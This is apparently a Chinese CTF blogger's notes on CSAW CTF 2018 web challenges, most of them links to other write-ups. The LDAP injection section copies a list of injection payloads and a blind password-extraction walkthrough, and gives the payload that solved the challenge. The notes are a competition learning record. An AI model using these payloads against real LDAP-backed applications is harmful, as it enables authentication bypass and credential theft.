caswctf

web题质量蛮高的

ldab

看名字估计就是ldap注入

按上次nox的payload试了试不行

github上搜了下

https://github.com/trapp3rhat/LDAP-injection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
LDAP-injection
Ldap injection payloads
LDAP injection
LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
Exploitation
user = *)(uid=*))(|(uid=*
pass = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
Payloads
*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
Blind Exploitation
We can extract using a bypass login
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
(&(sn=administrator)(password=MY*)) : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK

*)(uid=*))(|(uid=* 就出来了

页面上刚好有uid这个参数 换成其他有的参数也可以

SSO

好题啊 交学费 需要sso+ouath2.0的知识 还涉及到了 jwt

我查了好久ouath感觉还是没到点子上

一个感觉不错的ouath安全案例 虽然不是这题的点

https://coolshell.cn/articles/11021.html

参考
https://github.com/TryCTFAgain/CTF-Writeups/blob/master/2018/CSAW%20CTF'18/web.md#sso

Hacker Movie Club

浏览器缓存问题 歪果仁的题真是好新啊 又得交学费

参考
https://lud1161.github.io/posts/hacker-movie-club-csaw-quals-2018/

wtf sql

压轴题 慢慢看

https://blog.rpis.ec/2018/09/csaw-ctf-quals-2018-wtf-sql.html
找到了国内师傅的wp 中文看着还是爽 机翻看着真是,,,
https://qvq.im/post/CASW%20CTF%202018%20WTF.SQL%20writeup